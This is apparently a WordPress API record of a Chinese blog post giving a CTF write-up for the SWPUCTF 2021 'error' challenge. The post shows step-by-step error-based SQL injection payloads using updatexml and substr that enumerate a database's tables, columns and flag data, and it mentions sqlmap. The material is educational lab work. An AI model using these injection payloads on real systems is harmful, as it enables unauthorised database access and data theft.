{"id":1116,"date":"2025-01-18T23:22:35","date_gmt":"2025-01-18T15:22:35","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=1116"},"modified":"2025-01-18T23:22:37","modified_gmt":"2025-01-18T15:22:37","slug":"swpuctf-2021-%e6%96%b0%e7%94%9f%e8%b5%9berror","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/01\/18\/swpuctf-2021-%e6%96%b0%e7%94%9f%e8%b5%9berror\/","title":{"rendered":"SWPUCTF 2021 \u65b0\u751f\u8d5berror"},"content":{"rendered":"<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125200051.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125200051.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20241125200051.png\"><\/div><br \/>\n\u5c1d\u8bd5\u8f93\u5165 \u2018<br \/>\n\u53d1\u73b0\u662fget\u4f20\u53c2<br \/>\n\u5e76\u4e14\u662f\u5b57\u7b26\u578b<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125200158.png\" alt=\"Pasted image 20241125200158.png\"><\/p>\n<p>\u4f7f\u7528\u62a5\u9519\u6ce8\u5165<br \/>\n\u67e5\u5f53\u524d\u6570\u636e\u5e93\u540d<br \/>\n?id=%27 and  updatexml(1,concat(&#8216;~&#8217;,database(),&#8217;~&#8217;),3) %23<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125201014.png\" alt=\"Pasted image 20241125201014.png\"><\/p>\n<p>\u67e5\u8868\u540d<br \/>\n?id=%27 and  updatexml(1,concat(&#8216;~&#8217;,(select group_concat(table_name) from information_schema.tables where table_schema=database()),&#8217;~&#8217;),3) %23<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125201244.png\" alt=\"Pasted image 20241125201244.png\"><\/p>\n<p>\u67e5\u5b57\u6bb5<br \/>\n?id=%27 and  updatexml(1,concat(&#8216;~&#8217;,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#8217;test_tb&#8217;),&#8217;~&#8217;),3) %23<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125201413.png\" alt=\"Pasted image 20241125201413.png\"><\/p>\n<p>\u67e5\u6570\u636e<br \/>\n?id=%27 and  updatexml(1,concat(&#8216;~&#8217;,(select group_concat(flag,id) from test_db.test_tb),&#8217;~&#8217;),3) %23<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125201641.png\" alt=\"Pasted image 20241125201641.png\"><\/p>\n<p>\u4f7f\u7528substr\u51fd\u6570\u622a\u53d6\u5b57\u6bb5<br \/>\n?id=%27 and  updatexml(1,concat(&#8216;~&#8217;,(select substr(group_concat(flag,id),22,32) from test_db.test_tb),&#8217;~&#8217;),3) %23<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125202321.png\" alt=\"Pasted image 20241125202321.png\"><\/p>\n<p>\u62fc\u63a5flag<br \/>\nNSSCTF{f655bfab-5e7f-40f2-8136-b3a5c08a7694}<\/p>\n<p>\u6216\u8005\u4f7f\u7528sqlmap<br \/>\n\u542f\u52a8\u6307\u4ee4\uff1a<br \/>\npython sqlmap.py -h<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125202627.png\" alt=\"Pasted image 20241125202627.png\"><\/p>\n<h3>\u603b\u7ed3<\/h3>\n<p>\u62a5\u9519\u6ce8\u5165<br \/>\nsubstr\u622a\u53d6\u51fd\u6570<br \/>\nsqlmap\u5de5\u5177\u7684\u4f7f\u7528<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5c1d\u8bd5\u8f93\u5165 \u2018 \u53d1\u73b0\u662fget\u4f20\u53c2 \u5e76\u4e14\u662f\u5b57\u7b26\u578b \u4f7f\u7528\u62a5\u9519\u6ce8\u5165 \u67e5\u5f53\u524d\u6570\u636e\u5e93\u540d ?id=%27 and updat [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,22,23],"tags":[42],"class_list":["post-1116","post","type-post","status-publish","format-standard","hentry","category-ctf","category-ctf-web","category-nssctf","tag-42"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1116","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=1116"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1116\/revisions"}],"predecessor-version":[{"id":1117,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1116\/revisions\/1117"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=1116"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=1116"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=1116"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}